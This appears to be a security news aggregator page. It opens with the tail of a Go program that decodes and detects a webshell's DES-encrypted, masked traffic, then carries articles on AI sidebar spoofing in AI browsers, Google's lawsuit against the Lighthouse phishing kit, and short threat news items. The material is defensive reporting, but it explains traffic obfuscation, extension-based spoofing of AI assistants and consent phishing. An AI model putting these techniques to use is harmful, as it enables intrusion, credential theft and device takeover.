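	if len(data) == 0 || len(data)%blockSize != 0 {
		return nil, errors.New("length is not a multiple of the block size")
	}
	n := int(data[len(data)-1])
	if n < 1 || n > blockSize {
		return nil, errors.New("bad padding length")
	}
	for _, b := range data[len(data)-n:] {
		if int(b) != n {
			return nil, errors.New("inconsistent padding bytes")
		}
	}
	return data[:len(data)-n], nil
}

// desECB runs single DES block by block; ECB has no IV or chaining, so the
// same loop serves both directions depending on the block function passed in.
func desECB(data []byte, op func(dst, src []byte)) []byte {
	out := make([]byte, len(data))
	for i := 0; i < len(data); i += des.BlockSize {
		op(out[i:i+des.BlockSize], data[i:i+des.BlockSize])
	}
	return out
}

// DecodeShellBody mirrors the excerpt: unmask, Base64-decode, DES/ECB-decrypt
// with the hard-coded key, strip PKCS#5 padding.
func DecodeShellBody(body string) ([]byte, error) {
	raw, err := base64.StdEncoding.DecodeString(unmask(body))
	if err != nil {
		return nil, fmt.Errorf("base64: %w", err)
	}
	if len(raw) == 0 || len(raw)%des.BlockSize != 0 {
		return nil, errors.New("ciphertext is not a whole number of DES blocks")
	}
	block, err := des.NewCipher(shellKey)
	if err != nil {
		return nil, err
	}
	return pkcs5Unpad(desECB(raw, block.Decrypt), des.BlockSize)
}

// EncodeShellBody is the client side, used here only to build an offline sample.
func EncodeShellBody(payload []byte) string {
	block, _ := des.NewCipher(shellKey) // key length is fixed at 8 bytes above
	ct := desECB(pkcs5Pad(payload, des.BlockSize), block.Encrypt)
	return mask(base64.StdEncoding.EncodeToString(ct))
}

// LooksLikeShellStage is the analyst's check for a captured body: does it
// decrypt under the known key to a Java class file?
func LooksLikeShellStage(body string) bool {
	pt, err := DecodeShellBody(body)
	return err == nil && bytes.HasPrefix(pt, classMagic)
}

func main() {
	// Constructed sample: a class-file magic number plus filler, not a real payload.
	sample := append(append([]byte{}, classMagic...), []byte(" constructed-sample")...)
	wire := EncodeShellBody(sample)
	fmt.Println("wire body:", wire)
	_, err := base64.StdEncoding.DecodeString(wire)
	fmt.Println("parses as standard Base64:", err == nil)
	fmt.Println("decrypts to a class file:", LooksLikeShellStage(wire))
	fmt.Println("ordinary Base64 body flagged:", LooksLikeShellStage("aGVsbG8="))
}
```

Because single DES under a known key is reversible by anyone, the same code decrypts real captured traffic once the key has been pulled from the shell; the constructed sample in main() only stands in for such a capture. The character substitution also explains why the actor's bodies slip past detections that test for valid Base64: after masking, a body may not parse at all.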

image for How a fake AI sideba ...

 Threats

Cybersecurity researchers have revealed a new attack method targeting AI browsers, which they refer to as AI sidebar spoofing. This attack exploits users' growing habit of blindly trusting instructions they get from artificial intelligence. The researchers successfully implemented AI sidebar spoofing against two popular AI browsers: Comet by Perplexity and Atlas by OpenAI. Initially, the researchers used Comet for their experiments, but later confirmed that the attack was viable in the Atlas browser as well. This post uses Comet as an example when explaining the mechanics of AI sidebar spoofing, but we urge the reader to remember that everything stated below also applies to Atlas.

How do AI browsers work?

To begin, let's wrap our heads around AI browsers. The idea of artificial intelligence replacing, or at least transforming, the familiar process of searching the internet began to generate buzz between 2023 and 2024. The same period saw the first attempts to integrate AI into online search. Initially, these were supplementary features within conventional browsers, such as Microsoft Edge Copilot and Brave Leo, implemented as AI sidebars. They added built-in assistants to the browser interface for summarizing pages, answering questions, and navigating sites.

By 2025, the evolution of this concept ushered in Comet from Perplexity AI, the first browser designed for user-AI interaction from the ground up. This made artificial intelligence the centerpiece of Comet's user interface rather than just an add-on, unifying search, analysis, and work automation into a single experience. Shortly thereafter, in October 2025, OpenAI introduced its own AI browser, Atlas, built around the same concept. Comet's primary interface element is the input bar in the center of the screen, through which the user interacts with the AI. It's the same with Atlas.

The home screens of Comet and Atlas demonstrate a similar concept: a minimalist interface with a central input bar and built-in AI that becomes the primary method of interacting with the web.

In addition, AI browsers allow users to engage with the AI right on the web page. They do this through a built-in sidebar that analyzes content and handles queries without requiring the user to leave the page.
The user can ask the AI to summarize an article, explain a term, compare data, or generate a command while remaining on the current page.

The sidebars in both Comet and Atlas allow users to query the AI without navigating to separate tabs: you can analyze the current site, ask questions, and receive answers within the context of the page you're on.

This level of integration conditions users to take the answers and instructions provided by the built-in AI for granted. When an assistant is seamlessly built into the user interface and feels like a natural part of the system, most people rarely stop to double-check the actions it suggests. This trust is precisely what the attack demonstrated by the researchers exploits. A fake AI sidebar can issue false instructions, directing the user to execute malicious commands or visit phishing websites.

How did the researchers manage to execute the AI sidebar spoofing attack?

The attack starts with the user installing a malicious extension. To do its work, it needs permission to view and modify data on all visited sites, as well as access to the client-side storage API. Both are common permissions: any extension that reads or changes page content needs the first one, so widely used extensions such as ad blockers request exactly this combination. The chances that a user will grow suspicious when a new extension asks for them are therefore close to zero. You can read more about browser extensions and the permissions they request in our post Browser extensions: more dangerous than you think.

A list of installed extensions in the Comet user interface. The disguised malicious extension, AI Marketing Tool, is visible among them.

Once installed, the extension injects JavaScript into the web page and creates a counterfeit sidebar that looks strikingly similar to the real thing. This shouldn't raise any red flags with the user: when the extension receives a query, it forwards it to a legitimate LLM and faithfully displays the response.
The researchers used Google Gemini in their experiments, though OpenAI's ChatGPT likely would have worked just as well.

The screenshot shows an example of a fake sidebar that's visually very similar to the original Comet Assistant.

The fake sidebar can selectively manipulate responses to specific topics or key queries set in advance by the attacker. In most cases the extension simply displays legitimate AI responses, but for the chosen triggers it displays malicious instructions, links, or commands instead.

How realistic is the scenario where an unsuspecting user installs a malicious extension capable of the actions described above? Experience shows it is highly probable. On our blog, we've repeatedly reported on dozens of malicious and suspicious extensions that successfully make it into the official Chrome Web Store. This continues to occur despite all the security checks conducted by the store and the vast resources at Google's disposal. Read more about how malicious extensions end up in official stores in our post 57 shady Chrome extensions clock up six million installs.

Consequences of AI sidebar spoofing

Now let's discuss what attackers can use a fake sidebar for. As noted by the researchers, the AI sidebar spoofing attack offers potential malicious actors ample opportunities to cause harm. To demonstrate this, the researchers described three possible attack scenarios and their consequences: crypto-wallet phishing, Google account theft, and device takeover. Let's examine each of them in detail.

Using a fake AI sidebar to steal Binance credentials

In the first scenario, the user asks the AI in the sidebar how to sell their cryptocurrency on the Binance crypto exchange. The AI assistant provides a detailed answer that includes a link to the exchange. But this link doesn't lead to the real Binance site; it takes the user to a remarkably convincing fake.
The link points to the attacker's phishing site, which uses the look-alike domain name binacee.

The fake login form on the domain login{.}binacee{.}com is nearly indistinguishable from the original, and is designed to steal user credentials.

Next, the unsuspecting user enters their Binance credentials and, if prompted, the two-factor authentication code. With both, the attackers gain full access to the victim's account and can siphon off all funds from their crypto wallets.

Using a fake AI sidebar to take over a Google account

The next attack variation also begins with a phishing link, in this case to a fake file-sharing service. If the user clicks the link, they're taken to a website whose landing page immediately prompts them to sign in with their Google account. After the user clicks this option, they're redirected to the legitimate Google login page and enter their credentials there, but then the fake platform requests full access to the user's Google Drive and Gmail. This is consent phishing: the password and any second factor are entered on the real Google site, so what the attacker obtains is not the password but an OAuth grant, and the reliable remedy is to revoke that app explicitly under the account's third-party access settings.

The fake application share-sync-pro{.}vercel{.}app requests full access to the user's Gmail and Google Drive. This gives the attackers control over the account.

If the user fails to scrutinize the page and automatically clicks Allow, they grant the attackers permissions for highly dangerous actions:

Viewing their emails and settings.
Reading, creating, and sending emails from their Gmail account.
Viewing and downloading all the files they store in Google Drive.

This level of access gives the cybercriminals the ability to steal the victim's files, use services and accounts linked to that email address, and impersonate the account owner to send phishing messages.

Reverse shell initiated through a fake AI-generated utility installation guide

Finally, in the last scenario, the user asks the AI how to install a certain application; the Homebrew utility was used in the example, but it could be anything. The sidebar shows the user a perfectly reasonable, AI-generated guide.
All steps in it look plausible and correct up until the final stage, where the utility installation command is replaced with a reverse shell.

The guide for installing the utility as shown in the sidebar is almost entirely correct, but the last step contains a reverse shell command.

If the user follows the AI's instructions, copying the malicious line into the terminal and running it, their system is compromised: the attackers can download data from the device, monitor activity, or install malware and continue the attack. This scenario clearly demonstrates that a single replaced line in a trusted AI interface is enough to fully compromise a device.

How to avoid becoming a victim of fake AI sidebars

The AI sidebar spoofing attack is currently only a proof of concept. However, in recent years attackers have been quick to turn hypothetical threats into practical attacks, so it's quite possible that some malware author is already at work on a malicious extension with a fake AI sidebar, or uploading one to an official extension store. It's therefore important to remember that even a familiar browser interface can be compromised, and that instructions should not be trusted blindly just because they look convincing and come from the in-browser AI assistant. Here are some final tips to help you avoid falling victim to an attack involving a fake AI sidebar:

When using AI assistants, carefully check all commands and links before following the AI's recommendations. If the AI recommends executing any code, copy it and find out what it does, for example by pasting it into a search engine in a different, non-AI browser.

Don't install browser extensions, AI or otherwise, unless absolutely necessary. Regularly clean up and delete any extensions you no longer use.

Before installing an extension, read the user reviews.
Most malicious extensions rack up heaps of scathing reviews from duped users long before store moderators get around to removing them.

Before entering credentials or other confidential information, always check that the website address doesn't look suspicious or contain typos. Pay attention to the top-level domain, too: it should be the official one.

Use Kaspersky Password Manager to store passwords. If it doesn't recognize the site and doesn't automatically offer to fill in the login and password fields, this is a strong reason to ask yourself whether you might be on a phishing page.

Install a reliable security solution that will alert you to suspicious activity on your device and prevent you from visiting a phishing site.

What other threats await you in browsers, AI-powered or regular:

The pros and cons of AI-powered browsers
Taking the biscuit: why hackers like cookies so much
Turning purple: how visited links threaten your privacy
Privacy under attack: nasty surprises in Chrome, Edge, and Firefox
Dangerous browser extensions

image for Google Sues to Disru ...

 A Little Sunshine

Google is suing more than two dozen unnamed individuals allegedly involved in peddling a popular China-based mobile phishing service that helps scammers impersonate hundreds of trusted brands, blast out text message lures, and convert phished payment card data into mobile wallets from Apple and Google. In a lawsuit filed in the Southern District of New York on November 12, Google sued to unmask and disrupt 25 "John Doe" defendants allegedly linked to the sale of Lighthouse, a sophisticated phishing kit that makes it simple for even novices to steal payment card data from mobile users. Google said Lighthouse has harmed more than a million victims across 120 countries.

A component of the Chinese phishing kit Lighthouse made to target customers of The Toll Roads, which refers to several state routes through Orange County, Calif.

Lighthouse is one of several prolific phishing-as-a-service operations known collectively as the "Smishing Triad," and together they are responsible for sending millions of text messages that spoof the U.S. Postal Service to supposedly collect an outstanding delivery fee, or that pretend to be a local toll road operator warning of a delinquent toll. More recently, Lighthouse has been used to spoof e-commerce websites, financial institutions and brokerage firms.

Regardless of the lure or brand used, the basic scam remains the same: after the visitor enters their payment information, the phishing site automatically attempts to enroll the card in a mobile wallet from Apple or Google. The phishing site then tells the visitor that their bank is going to verify the transaction by sending a one-time code that must be entered into the payment page before the transaction can be completed. That code is in fact the bank's verification for the wallet enrollment the phishing site just triggered; if the recipient provides it, the scammers can link the victim's card to a mobile wallet on a device that they control. Researchers say the fraudsters usually load several stolen wallets onto each mobile device, and wait 7-10 days after enrollment before selling the phones or using them for fraud.
Google called the scale of the Lighthouse phishing attacks "staggering." A May 2025 report from Silent Push found the domains used by the Smishing Triad are rotated frequently, with approximately 25,000 phishing domains active during any 8-day period.

Google's lawsuit alleges the purveyors of Lighthouse violated the company's trademarks by including Google's logos on countless phishing websites. The complaint says Lighthouse offers over 600 templates for phishing websites of more than 400 entities, and that Google's logos were featured on at least a quarter of those templates.

Google is also pursuing Lighthouse under the Racketeer Influenced and Corrupt Organizations (RICO) Act, saying the Lighthouse phishing enterprise encompasses several connected threat actor groups that work together to design and implement complex criminal schemes targeting the general public. According to Google, those teams include a "developer group" that supplies the phishing software and templates; a "data broker group" that provides lists of targets; a "spammer group" that provides the tools to send fraudulent text messages in volume; a "theft group," in charge of monetizing the phished information; and an "administrative group," which runs the Telegram support channels and discussion groups designed to facilitate collaboration and recruit new members.

"While different members of the Enterprise may play different roles in the Schemes, they all collaborate to execute phishing attacks that rely on the Lighthouse software," Google's complaint alleges. "None of the Enterprise's Schemes can generate revenue without collaboration and cooperation among the members of the Enterprise.
All of the threat actor groups are connected to one another through historical and current business ties, including through their use of Lighthouse and the online community supporting its use, which exists on both YouTube and Telegram channels."

Silent Push's May report observed that the Smishing Triad boasts it has "300+ front desk staff worldwide" involved in Lighthouse, staff mainly used to support various aspects of the group's fraud and cash-out schemes.

An image shared by an SMS phishing group shows a panel of mobile phones responsible for mass-sending phishing messages.

These panels require a live operator because the one-time codes shared by phishing victims must be used quickly: they generally expire within a few minutes.

Google alleges that in addition to blasting out text messages spoofing known brands, Lighthouse makes it easy for customers to mass-create fake e-commerce websites that are advertised using Google Ads accounts (and paid for with stolen credit cards). These phony merchants collect payment card information at checkout, and then prompt the customer to expect and share a one-time code sent from their financial institution. Once again, that one-time code is sent by the bank because the fake e-commerce site has just attempted to enroll the victim's payment card in a mobile wallet. By the time a victim understands they will likely never receive the item they just purchased, the scammers have already run through hundreds of dollars in fraudulent charges, often at high-end electronics stores or jewelers.

Ford Merrill works in security research at SecAlliance, a CSIS Security Group company, and he has been tracking Chinese SMS phishing groups for several years. Merrill said many Lighthouse customers are now using the phishing kit to erect fake e-commerce websites that are advertised on Google and Meta platforms.
"You find this shop by searching for a particular product online or whatever, and you think you're getting a good deal," Merrill said. "But of course you never receive the product, and they will phish that one-time code at checkout."

Merrill said some of the phishing templates include payment buttons for services like PayPal, and that victims who choose to pay through PayPal can also see their PayPal accounts hijacked.

A fake e-commerce site from the Smishing Triad spoofing PayPal on a mobile device.

"The main advantage of the fake e-commerce site is that it doesn't require them to send out message lures," Merrill said, noting that the fake vendor sites have more staying power than traditional phishing sites because it takes far longer for them to be flagged for fraud.

Merrill said Google's legal action may temporarily disrupt the Lighthouse operators, and could make it easier for U.S. federal authorities to bring criminal charges against the group. But he said the Chinese mobile phishing market is so lucrative right now that it's difficult to imagine a popular phishing service voluntarily turning out the lights.

Merrill said Google's lawsuit also can help lay the groundwork for future disruptive actions against Lighthouse and other phishing-as-a-service entities that are operating almost entirely on Chinese networks. According to Silent Push, a majority of the phishing sites created with these kits are hosted at two Chinese hosting companies: Tencent (AS132203) and Alibaba (AS45102).

"Once Google has a default judgment against the Lighthouse guys in court, theoretically they could use that to go to Alibaba and Tencent and say, 'These guys have been found guilty, here are their domains and IP addresses, we want you to shut these down or we'll include you in the case.'"

If Google can bring that kind of legal pressure consistently over time, Merrill said, they might succeed in increasing costs for the phishers and more frequently disrupting their operations.
“If you take all of these Chinese phishing kit developers, I have to believe it’s tens of thousands of Chinese-speaking people involved,” he said. “The Lighthouse guys will probably burn down their Telegram channels and disappear for a while. They might call it something else or redevelop their service entirely. But I don’t believe for a minute they’re going to close up shop and leave forever.”

 Feed

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Wednesday added a critical security flaw impacting WatchGuard Fireware to its Known Exploited Vulnerabilities (KEV) catalog, based on evidence of active exploitation. The vulnerability in question is CVE-2025-9242 (CVSS score: 9.3), an out-of-bounds write vulnerability affecting Fireware OS 11.10.2 up to and including

 Feed

Cybersecurity researchers are calling attention to a large-scale spam campaign that has flooded the npm registry with thousands of fake packages since early 2024 as part of a likely financially motivated effort. "The packages were systematically published over an extended period, flooding the npm registry with junk packages that survived in the ecosystem for almost two years," Endor Labs

 Feed

Behind every click, there’s a risk waiting to be tested. A simple ad, email, or link can now hide something dangerous. Hackers are getting smarter, using new tools to sneak past filters and turn trusted systems against us. But security teams are fighting back. They’re building faster defenses, better ways to spot attacks, and stronger systems to keep people safe. It’s a constant race — every

 Feed

Cybersecurity researchers have uncovered a malicious Chrome extension that poses as a legitimate Ethereum wallet but harbors functionality to exfiltrate users' seed phrases. The name of the extension is "Safery: Ethereum Wallet," with the threat actor describing it as a "secure wallet for managing Ethereum cryptocurrency with flexible settings." It was uploaded to the Chrome Web Store on

 Feed

The Race for Every New CVE Based on multiple 2025 industry reports: roughly 50 to 61 percent of newly disclosed vulnerabilities saw exploit code weaponized within 48 hours. Using the CISA Known Exploited Vulnerabilities Catalog as a reference, hundreds of software flaws are now confirmed as actively targeted within days of public disclosure. Each new announcement now triggers a global race

 Feed

Malware families like Rhadamanthys Stealer, Venom RAT, and the Elysium botnet have been disrupted as part of a coordinated law enforcement operation led by Europol and Eurojust. The activity, which is taking place between November 10 and 13, 2025, marks the latest phase of Operation Endgame, an ongoing operation designed to take down criminal infrastructures and combat ransomware enablers

 Feed

A Russian-speaking threat actor behind an ongoing, mass phishing campaign has registered more than 4,300 domain names since the start of the year. The activity, per Netcraft security researcher Andrew Brandt, targets customers of the hospitality industry, specifically hotel guests who may have travel reservations, using spam emails. The campaign is said to have begun in earnest around

 AI

Tinder has got a plan to rummage through your camera roll, and Warren Buffett keeps popping up in convincing deepfakes dishing "number one investment tips." Meanwhile, will agentic AI replace your co-hosts before you can say "EDR for robots"? And why you should still read books. All this, plus Lily Allen's new album and Claude Code, come up for discussion in episode 443 of the "Smashing Security" podcast, with special guest Ron Eddings.

2025-11
Aggregator history
Thursday, November 13